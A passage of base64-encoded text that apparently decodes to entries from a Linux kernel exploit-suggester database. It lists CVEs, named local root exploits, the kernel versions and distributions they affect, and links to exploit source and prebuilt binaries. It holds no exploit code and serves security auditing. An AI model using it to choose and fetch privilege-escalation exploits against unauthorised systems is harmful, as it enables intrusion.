Gh0dHBzOi8vam9uLm9iZXJoZWlkZS5vcmcvYmxvZy8yMDEwLzA0LzEwL3JlaXNlcmZzLXJlaXNlcmZzX3ByaXYtdnVsbmVyYWJpbGl0eS8Kc3JjLXVybDogaHR0cHM6Ly9qb24ub2JlcmhlaWRlLm9yZy9maWxlcy90ZWFtLWVkd2FyZC5weQpleHBsb2l0LWRiOiAxMjEzMApjb21tZW50czogUmVxdWlyZXMgYSBSZWlzZXJGUyBmaWxlc3lzdGVtIG1vdW50ZWQgd2l0aCBleHRlbmRlZCBhdHRyaWJ1dGVzCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMjk1OV0ke3R4dHJzdH0gY2FuX2JjbQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjE4LHZlcjw9Mi42LjM2ClRhZ3M6IHVidW50dT0xMC4wNHtrZXJuZWw6Mi42LjMyLTI0LWdlbmVyaWN9ClJhbms6IDEKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjQxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvY2FuX2JjbQpleHBsb2l0LWRiOiAxNDgxNApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEwLTM5MDRdJHt0eHRyc3R9IHJkcwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjMwLHZlcjwyLjYuMzcKVGFnczogZGViaWFuPTYuMHtrZXJuZWw6Mi42LigzMXwzMnwzNHwzNSktKDF8dHJ1bmspLWFtZDY0fSx1YnVudHU9MTAuMTB8OS4xMCxmZWRvcmE9MTN7a2VybmVsOjIuNi4zMy4zLTg1LmZjMTMuaTY4Ni5QQUV9LHVidW50dT0xMC4wNHtrZXJuZWw6Mi42LjMyLSgyMXwyNCktZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cuc2VjdXJpdHlmb2N1cy5jb20vYXJjaGl2ZS8xLzUxNDM3OQpzcmMtdXJsOiBodHRwOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDEwMTAyMDA0NDA0OC9odHRwOi8vd3d3LnZzZWN1cml0eS5jb20vZG93bmxvYWQvdG9vbHMvbGludXgtcmRzLWV4cGxvaXQuYwpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxNjA2MDIxOTI2NDEvaHR0cHM6Ly93d3cua2VybmVsLWV4cGxvaXRzLmNvbS9tZWRpYS9yZHMKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjQxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvcmRzNjQKZXhwbG9pdC1kYjogMTUyODUKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC0zODQ4LENWRS0yMDEwLTM4NTAsQ1ZFLTIwMTAtNDA3M10ke3R4dHJzdH0gaGFsZl9uZWxzb24KUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjM2ClRhZ3M6IHVidW50dT0oMTAuMDR8OS4xMCl7a2VybmVsOjIuNi4oMzF8MzIpLSgxNHwyMSktc2VydmVyfQpSYW5rOiAxCmJpbi11cmw6IGh0dHA6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvaGFsZi1uZWxzb24zCmV4cGxvaXQtZGI6IDE3Nzg3CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bTi9BXSR7dHh0cnN0fSBjYXBzX3RvX3Jvb3QKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4zNCx2ZXI8PTIuNi4zNix4ODYKVGFnczogdWJ1bnR1PTEwLjEwClJhbms6IDEKZXhwbG9pdC1kYjogMTU5MTYKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtOL0FdJHt0eHRyc3R9IGNhcHNfdG9fcm9vdCAyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMzQsdmVyPD0yLjYuMzYKVGFnczogdWJ1bnR1PTEwLjEwClJhbms6IDEKZXhwbG9pdC1kYjogMTU5NDQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC00MzQ3XSR7dHh0cnN0fSBhbWVyaWNhbi1zaWduLWxhbmd1YWdlClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMCx2ZXI8PTIuNi4zNgpUYWdzOgpSYW5rOiAxCmV4cGxvaXQtZGI6IDE1Nzc0CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTAtMzQzN10ke3R4dHJzdH0gcGt0Y2R2ZApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMzYKVGFnczogdWJ1bnR1PTEwLjA0ClJhbms6IDEKZXhwbG9pdC1kYjogMTUxNTAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMC0zMDgxXSR7dHh0cnN0fSB2aWRlbzRsaW51eApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49Mi42LjAsdmVyPD0yLjYuMzMKVGFnczogUkhFTD01ClJhbms6IDEKZXhwbG9pdC1kYjogMTUwMjQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMi0wMDU2XSR7dHh0cnN0fSBtZW1vZGlwcGVyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMCx2ZXI8PTMuMS4wClRhZ3M6IHVidW50dT0oMTAuMDR8MTEuMTApe2tlcm5lbDozLjAuMC0xMi0oZ2VuZXJpY3xzZXJ2ZXIpfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXQuengyYzQuY29tL0NWRS0yMDEyLTAwNTYvYWJvdXQvCnNyYy11cmw6IGh0dHBzOi8vZ2l0Lnp4MmM0LmNvbS9DVkUtMjAxMi0wMDU2L3BsYWluL21lbXBvZGlwcGVyLmMKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvbWVtb2RpcHBlcgpiaW4tdXJsOiBodHRwczovL3dlYi5hcmNoaXZlLm9yZy93ZWIvMjAxNjA2MDIxOTI2MzEvaHR0cHM6Ly93d3cua2VybmVsLWV4cGxvaXRzLmNvbS9tZWRpYS9tZW1vZGlwcGVyNjQKZXhwbG9pdC1kYjogMTg0MTEKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMi0wMDU2LENWRS0yMDEwLTM4NDksQ1ZFLTIwMTAtMzg1MF0ke3R4dHJzdH0gZnVsbC1uZWxzb24KUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4wLHZlcjw9Mi42LjM2ClRhZ3M6IHVidW50dT0oOS4xMHwxMC4xMCl7a2VybmVsOjIuNi4oMzF8MzUpLSgxNHwxOSktKHNlcnZlcnxnZW5lcmljKX0sdWJ1bnR1PTEwLjA0e2tlcm5lbDoyLjYuMzItKDIxfDI0KS1zZXJ2ZXJ9ClJhbms6IDEKc3JjLXVybDogaHR0cDovL3Z1bG5mYWN0b3J5Lm9yZy9leHBsb2l0cy9mdWxsLW5lbHNvbi5jCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL2Z1bGwtbmVsc29uCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL2Z1bGwtbmVsc29uNjQKZXhwbG9pdC1kYjogMTU3MDQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMy0xODU4XSR7dHh0cnN0fSBDTE9ORV9ORVdVU0VSfENMT05FX0ZTClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPTMuOCxDT05GSUdfVVNFUl9OUz15ClRhZ3M6IApSYW5rOiAxCnNyYy11cmw6IGh0dHA6Ly9zdGVhbHRoLm9wZW53YWxsLm5ldC94U3BvcnRzL2Nsb3duLW5ld3VzZXIuYwphbmFseXNpcy11cmw6IGh0dHBzOi8vbHduLm5ldC9BcnRpY2xlcy81NDMyNzMvCmV4cGxvaXQtZGI6IDM4MzkwCmF1dGhvcjogU2ViYXN0aWFuIEtyYWhtZXIKQ29tbWVudHM6IENPTkZJR19VU0VSX05TIG5lZWRzIHRvIGJlIGVuYWJsZWQgCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMjA5NF0ke3R4dHJzdH0gcGVyZl9zd2V2ZW50ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMzIsdmVyPDMuOC45LHg4Nl82NApUYWdzOiBSSEVMPTYsdWJ1bnR1PTEyLjA0e2tlcm5lbDozLjIuMC0oMjN8MjkpLWdlbmVyaWN9LGZlZG9yYT0xNntrZXJuZWw6My4xLjAtNy5mYzE2Lng4Nl82NH0sZmVkb3JhPTE3e2tlcm5lbDozLjMuNC01LmZjMTcueDg2XzY0fSxkZWJpYW49N3trZXJuZWw6My4yLjAtNC1hbWQ2NH0KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly90aW1ldG9ibGVlZC5jb20vYS1jbG9zZXItbG9vay1hdC1hLXJlY2VudC1wcml2aWxlZ2UtZXNjYWxhdGlvbi1idWctaW4tbGludXgtY3ZlLTIwMTMtMjA5NC8KYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvcGVyZl9zd2V2ZW50CmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL3BlcmZfc3dldmVudDY0CmV4cGxvaXQtZGI6IDI2MTMxCmF1dGhvcjogQW5kcmVhICdzb3JibycgQml0dGF1CkNvbW1lbnRzOiBObyBTTUVQL1NNQVAgYnlwYXNzCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMjA5NF0ke3R4dHJzdH0gcGVyZl9zd2V2ZW50IDIKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4zMix2ZXI8My44LjkseDg2XzY0ClRhZ3M6IHVidW50dT0xMi4wNHtrZXJuZWw6My4oMnw1KS4wLSgyM3wyOSktZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly90aW1ldG9ibGVlZC5jb20vYS1jbG9zZXItbG9vay1hdC1hLXJlY2VudC1wcml2aWxlZ2UtZXNjYWxhdGlvbi1idWctaW4tbGludXgtY3ZlLTIwMTMtMjA5NC8Kc3JjLXVybDogaHR0cHM6Ly9jeXNlY2xhYnMuY29tL2V4cGxvaXRzL3ZuaWtfdjEuYwpleHBsb2l0LWRiOiAzMzU4OQphdXRob3I6IFZpdGFseSAndm5paycgTmlrb2xlbmtvCkNvbW1lbnRzOiBObyBTTUVQL1NNQVAgYnlwYXNzCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMDI2OF0ke3R4dHJzdH0gbXNyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMTgsdmVyPDMuNy42ClRhZ3M6IApSYW5rOiAxCmV4cGxvaXQtZGI6IDI3Mjk3CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMTk1OV0ke3R4dHJzdH0gdXNlcm5zX3Jvb3Rfc3Bsb2l0ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMSx2ZXI8My44LjkKVGFnczogClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxMy8wNC8yOS8xCmV4cGxvaXQtZGI6IDI1NDUwCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTMtMjA5NF0ke3R4dHJzdH0gc2VtdGV4ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0yLjYuMzIsdmVyPDMuOC45ClRhZ3M6IFJIRUw9NgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3RpbWV0b2JsZWVkLmNvbS9hLWNsb3Nlci1sb29rLWF0LWEtcmVjZW50LXByaXZpbGVnZS1lc2NhbGF0aW9uLWJ1Zy1pbi1saW51eC1jdmUtMjAxMy0yMDk0LwpleHBsb2l0LWRiOiAyNTQ0NApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTAwMzhdJHt0eHRyc3R9IHRpbWVvdXRwd24KUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMuNC4wLHZlcjw9My4xMy4xLENPTkZJR19YODZfWDMyPXkKVGFnczogdWJ1bnR1PTEzLjEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vYmxvZy5pbmNsdWRlc2VjdXJpdHkuY29tLzIwMTQvMDMvZXhwbG9pdC1DVkUtMjAxNC0wMDM4LXgzMi1yZWN2bW1zZy1rZXJuZWwtdnVsbmVyYWJsaXR5Lmh0bWwKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvdGltZW91dHB3bjY0CmV4cGxvaXQtZGI6IDMxMzQ2CkNvbW1lbnRzOiBDT05GSUdfWDg2X1gzMiBuZWVkcyB0byBiZSBlbmFibGVkCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtMDAzOF0ke3R4dHJzdH0gdGltZW91dHB3biAyClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjQuMCx2ZXI8PTMuMTMuMSxDT05GSUdfWDg2X1gzMj15ClRhZ3M6IHVidW50dT0oMTMuMDR8MTMuMTApe2tlcm5lbDozLig4fDExKS4wLSgxMnwxNXwxOSktZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9ibG9nLmluY2x1ZGVzZWN1cml0eS5jb20vMjAxNC8wMy9leHBsb2l0LUNWRS0yMDE0LTAwMzgteDMyLXJlY3ZtbXNnLWtlcm5lbC12dWxuZXJhYmxpdHkuaHRtbApleHBsb2l0LWRiOiAzMTM0NwpDb21tZW50czogQ09ORklHX1g4Nl9YMzIgbmVlZHMgdG8gYmUgZW5hYmxlZApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTAxOTZdJHt0eHRyc3R9IHJhd21vZGVQVFkKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTIuNi4zMSx2ZXI8PTMuMTQuMwpUYWdzOgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2Jsb2cuaW5jbHVkZXNlY3VyaXR5LmNvbS8yMDE0LzA2L2V4cGxvaXQtd2Fsa3Rocm91Z2gtY3ZlLTIwMTQtMDE5Ni1wdHkta2VybmVsLXJhY2UtY29uZGl0aW9uLmh0bWwKZXhwbG9pdC1kYjogMzM1MTYKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC0yODUxXSR7dHh0cnN0fSB1c2UtYWZ0ZXItZnJlZSBpbiBwaW5nX2luaXRfc29jaygpICR7YmxkYmx1fShEb1MpJHt0eHRyc3R9ClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMSx2ZXI8PTMuMTQKVGFnczogClJhbms6IDAKYW5hbHlzaXMtdXJsOiBodHRwczovL2N5c2VjbGFicy5jb20vcGFnZT9uPTAyMDEyMDE2CmV4cGxvaXQtZGI6IDMyOTI2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtNDAxNF0ke3R4dHJzdH0gaW5vZGVfY2FwYWJsZQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjEsdmVyPD0zLjEzClRhZ3M6IHVidW50dT0xMi4wNApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTQvMDYvMTAvNApleHBsb2l0LWRiOiAzMzgyNApFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTQ2OTldJHt0eHRyc3R9IHB0cmFjZS9zeXNyZXQKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTMuMC4xLHZlcjw9My44ClRhZ3M6IHVidW50dT0xMi4wNApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTQvMDcvMDgvMTYKZXhwbG9pdC1kYjogMzQxMzQKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC00OTQzXSR7dHh0cnN0fSBQUFBvTDJUUCAke2JsZGJsdX0oRG9TKSR7dHh0cnN0fQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4yLHZlcjw9My4xNS42ClRhZ3M6IApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9jeXNlY2xhYnMuY29tL3BhZ2U/bj0wMTEwMjAxNQpleHBsb2l0LWRiOiAzNjI2NwpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE0LTUyMDddJHt0eHRyc3R9IGZ1c2Vfc3VpZApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjEsdmVyPD0zLjE2LjEKVGFnczogClJhbms6IDEKZXhwbG9pdC1kYjogMzQ5MjMKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS05MzIyXSR7dHh0cnN0fSBCYWRJUkVUClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMSx2ZXI8My4xNy41LHg4Nl82NApUYWdzOiBSSEVMPD03LGZlZG9yYT0yMApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2xhYnMuYnJvbWl1bS5jb20vMjAxNS8wMi8wMi9leHBsb2l0aW5nLWJhZGlyZXQtdnVsbmVyYWJpbGl0eS1jdmUtMjAxNC05MzIyLWxpbnV4LWtlcm5lbC1wcml2aWxlZ2UtZXNjYWxhdGlvbi8Kc3JjLXVybDogaHR0cDovL3NpdGUucGkzLmNvbS5wbC9leHAvcF9jdmUtMjAxNC05MzIyLnRhci5negpleHBsb2l0LWRiOgphdXRob3I6IFJhZmFsICduM3JnYWwnIFdvanRjenVrICYgQWRhbSAncGkzJyBaYWJyb2NraQpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTMyOTBdJHt0eHRyc3R9IGVzcGZpeDY0X05NSQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4xMyx2ZXI8NC4xLjYseDg2XzY0ClRhZ3M6IApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTUvMDgvMDQvOApleHBsb2l0LWRiOiAzNzcyMgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W04vQV0ke3R4dHJzdH0gYmx1ZXRvb3RoClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPD0yLjYuMTEKVGFnczoKUmFuazogMQpleHBsb2l0LWRiOiA0NzU2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtMTMyOF0ke3R4dHJzdH0gb3ZlcmxheWZzClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjEzLjAsdmVyPD0zLjE5LjAKVGFnczogdWJ1bnR1PSgxMi4wNHwxNC4wNCl7a2VybmVsOjMuMTMuMC0oMnwzfDR8NSkqLWdlbmVyaWN9LHVidW50dT0oMTQuMTB8MTUuMDQpe2tlcm5lbDozLigxM3wxNikuMC0qLWdlbmVyaWN9ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vc2VjbGlzdHMub3JnL29zcy1zZWMvMjAxNS9xMi83MTcKYmluLXVybDogaHR0cHM6Ly93ZWIuYXJjaGl2ZS5vcmcvd2ViLzIwMTYwNjAyMTkyNjMxL2h0dHBzOi8vd3d3Lmtlcm5lbC1leHBsb2l0cy5jb20vbWVkaWEvb2ZzXzMyCmJpbi11cmw6IGh0dHBzOi8vd2ViLmFyY2hpdmUub3JnL3dlYi8yMDE2MDYwMjE5MjYzMS9odHRwczovL3d3dy5rZXJuZWwtZXhwbG9pdHMuY29tL21lZGlhL29mc182NApleHBsb2l0LWRiOiAzNzI5MgpFT0YKKQoKRVhQTE9JVFNbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTg2NjBdJHt0eHRyc3R9IG92ZXJsYXlmcyAob3ZsX3NldGF0dHIpClJlcXM6IHBrZz1saW51eC1rZXJuZWwsdmVyPj0zLjAuMCx2ZXI8PTQuMy4zClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vd3d3LmhhbGZkb2cubmV0L1NlY3VyaXR5LzIwMTUvVXNlck5hbWVzcGFjZU92ZXJsYXlmc1NldHVpZFdyaXRlRXhlYy8KZXhwbG9pdC1kYjogMzkyMzAKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS04NjYwXSR7dHh0cnN0fSBvdmVybGF5ZnMgKG92bF9zZXRhdHRyKQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjAsdmVyPD00LjMuMwpUYWdzOiB1YnVudHU9KDE0LjA0fDE1LjEwKXtrZXJuZWw6NC4yLjAtKDE4fDE5fDIwfDIxfDIyKS1nZW5lcmljfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3d3dy5oYWxmZG9nLm5ldC9TZWN1cml0eS8yMDE1L1VzZXJOYW1lc3BhY2VPdmVybGF5ZnNTZXR1aWRXcml0ZUV4ZWMvCmV4cGxvaXQtZGI6IDM5MTY2CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtMDcyOF0ke3R4dHJzdH0ga2V5cmluZwpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4xMCx2ZXI8NC40LjEKVGFnczoKUmFuazogMAphbmFseXNpcy11cmw6IGh0dHA6Ly9wZXJjZXB0aW9uLXBvaW50LmlvLzIwMTYvMDEvMTQvYW5hbHlzaXMtYW5kLWV4cGxvaXRhdGlvbi1vZi1hLWxpbnV4LWtlcm5lbC12dWxuZXJhYmlsaXR5LWN2ZS0yMDE2LTA3MjgvCmV4cGxvaXQtZGI6IDQwMDAzCkNvbW1lbnRzOiBFeHBsb2l0IHRha2VzIGFib3V0IH4zMCBtaW51dGVzIHRvIHJ1bi4gRXhwbG9pdCBpcyBub3QgcmVsaWFibGUsIHNlZTogaHR0cHM6Ly9jeXNlY2xhYnMuY29tL2Jsb2cvY3ZlLTIwMTYtMDcyOC1wb2Mtbm90LXdvcmtpbmcKRU9GCikKCkVYUExPSVRTWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi0yMzg0XSR7dHh0cnN0fSB1c2ItbWlkaQpSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49My4wLjAsdmVyPD00LjQuOApUYWdzOiB1YnVudHU9MTQuMDQsZmVkb3JhPTIyClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3hhaXJ5LmdpdGh1Yi5pby9ibG9nLzIwMTYvY3ZlLTIwMTYtMjM4NApzcmMtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20veGFpcnkva2VybmVsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNi0yMzg0L3BvYy5jCmV4cGxvaXQtZGI6IDQxOTk5CkNvbW1lbnRzOiBSZXF1aXJlcyBhYmlsaXR5IHRvIHBsdWcgaW4gYSBtYWxpY2lvdXMgVVNCIGRldmljZSBhbmQgdG8gZXhlY3V0ZSBhIG1hbGljaW91cyBiaW5hcnkgYXMgYSBub24tcHJpdmlsZWdlZCB1c2VyCmF1dGhvcjogQW5kcmV5ICd4YWlyeScgS29ub3ZhbG92CkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtNDk5N10ke3R4dHJzdH0gdGFyZ2V0X29mZnNldApSZXFzOiBwa2c9bGludXgta2VybmVsLHZlcj49NC40LjAsdmVyPD00LjQuMCxjbWQ6Z3JlcCAtcWkgaXBfdGFibGVzIC9wcm9jL21vZHVsZXMKVGFnczogdWJ1bnR1PTE2LjA0e2tlcm5lbDo0LjQuMC0yMS1nZW5lcmljfQpSYW5rOiAxCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9vZmZlbnNpdmUtc2VjdXJpdHkvZXhwbG9pdC1kYXRhYmFzZS1iaW4tc3Bsb2l0cy9yYXcvbWFzdGVyL2Jpbi1zcGxvaXRzLzQwMDUzLnppcApDb21tZW50czogaXBfdGFibGVzLmtvIG5lZWRzIHRvIGJlIGxvYWRlZApleHBsb2l0LWRiOiA0MDA0OQphdXRob3I6IFZpdGFseSAndm5paycgTmlrb2xlbmtvCkVPRgopCgpFWFBMT0lUU1soKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtNDU1N10ke3R4dHJzdH0gZG91YmxlLWZkcHV0KCkKUmVxczogcGtnPWxpbnV4LWtlcm5lbCx2ZXI+PTQuNCx2ZXI8NC41LjUsQ09ORklHX0JQRl9TWVNDQUxMPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfYnBmX2Rpc2FibGVkIT0xClRhZ3M6IHVidW50dT0xNi4wNHtrZXJuZWw6NC40LjAtMjEtZ2VuZXJpY30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vYnVncy5jaHJvbWl1bS5vcmcvcC9wcm9qZWN0LXplcm8vaXNzdWVzL2RldGFpbD9pZD04MDgKc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL29mZmVuc2l2ZS1zZWN1cml0eS9leHBsb2l0LWRhdGFiYXNlLWJpbi1zcGxvaXRzL3Jhdy9tYXN0ZXIvYmluLXNwbG9pdHMvMzk3NzIuemlwCkNvbW1lbnRzOiBDT05GSUdfQlBGX1NZU0